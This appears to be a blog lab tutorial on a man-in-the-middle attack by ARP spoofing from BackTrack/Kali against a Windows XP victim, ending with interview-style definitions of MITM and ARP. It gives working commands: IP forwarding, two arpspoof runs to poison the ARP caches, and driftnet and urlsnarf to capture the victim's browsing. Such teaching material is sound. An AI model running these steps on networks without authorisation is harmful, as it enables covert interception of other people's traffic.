Man In The Middle Attack Using ARP Spoofing

Implementing the MITM using ARP Spoofing using Back-Track 5 or Kali Linux

Tools used:-





Tools description in brief:-

Nmap:- Used to discover the devices on the network

Arpspoof:- We use it twice

1. To lie to the Gateway about the MAC address of victim

MAC Address of Victim is that of Back-Track’s

2. To lie to the Victim about the MAC address of Gateway

MAC Address of Gateway is that of Back-Track’s

Driftnet:- Displays the Graphics, that Victim browses over Internet

Urlsnarf:- Gives the details of URLs, that Victim visits

Overview of the MITM Attack:-

Actual Topology

Before attack

After the Attack :-

1. In XP the Gateway MAC Address is changed to the MAC Address of Backtrack5

2. In Gateway the XP MAC Address is changed to the MAC Address of Backtrack5

After attack

In XP Machine:-

Step1: To see the IP Address: ipconfig


Step2: To see the ARP Cache: arp –a


Step3: To see the IP Address and MAC Address: ipconfig /all


In Backtrack5 Machine:-

Nmap Scan for choosing Victim:


Step1: To get the IP Address from DHCP Server: dhclient eth0


Step2: To see the IP Address & MAC Address: ifconfig eth0


Step3: To Route the traffic through Backtrack we have to enable the forwarding:

echo 1 > /proc/sys/net/ipv4/ip_forward


Step4: To tell/lie to Victim XP that Gateway is at Backtrack MAC Address:

arpspoof –i eth0 –t <Victim IP> <Gateway IP>

Step5: Opening Wireshark to see the network traffic: wireshark



Step6: To tell/lie to Gateway that Victim XP is at Backtrack MAC Address:

arpspoof –i eth0 –t <Gateway IP> <Victim IP>



Step7: You can now see the spoofed ARP Cache in Victim-XP


Step8: To view the victim’s web surfing content in Backtrack5:

driftnet -i eth0 -> shows the graphics the user browses

urlsnarf -i eth0 -> shows urls visited by victim


Step9: Open Web-browser in XP and go to some site for example:


Driftnet showing the images of victim’s browsing content in Backtrack5:


Urlsnarf showing the urls visited by victim in Backtrack5:

Possible Interview Questions:-

What is Man In The Middle Attack?

The man-in-the-middle attack (often abbreviated MITM, MitM, MIM, MiM, MITMA) in cryptography and computer security is a form of active eavesdropping in which the attacker makes independent connections with the victims and relays messages between them, making them believe that they are talking directly to each other over a private connection, when in fact the entire conversation is controlled by the attacker.

What is ARP?

The Address Resolution Protocol (ARP) is a widely used protocol for resolving network layer addresses into link layer addresses.

When an Internet Protocol (IP) datagram is sent from one host to another on a local area network, the destination IP address must be converted into a MAC address for transmission via the data link layer. When another host’s IP address is known, and its MAC address is needed, a broadcast packet is sent out on the local network. This packet is known as an ARP request. The destination machine with the IP in the ARP request then responds with an ARP reply, which contains the MAC address for that IP.

ARP is a stateless protocol. Network hosts will automatically cache any ARP replies they receive, regardless of whether or not they requested them. Even ARP entries which have not yet expired will be overwritten when a new ARP reply packet is received.

What is ARP Spoofing?


ARP spoofing is a technique whereby an attacker sends fake (“spoofed”) Address Resolution Protocol (ARP) messages onto a Local Area Network. Generally, the aim is to associate the attacker’s MAC address with the IP address of another host (such as the default gateway), causing any traffic meant for that IP address to be sent to the attacker instead.


Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s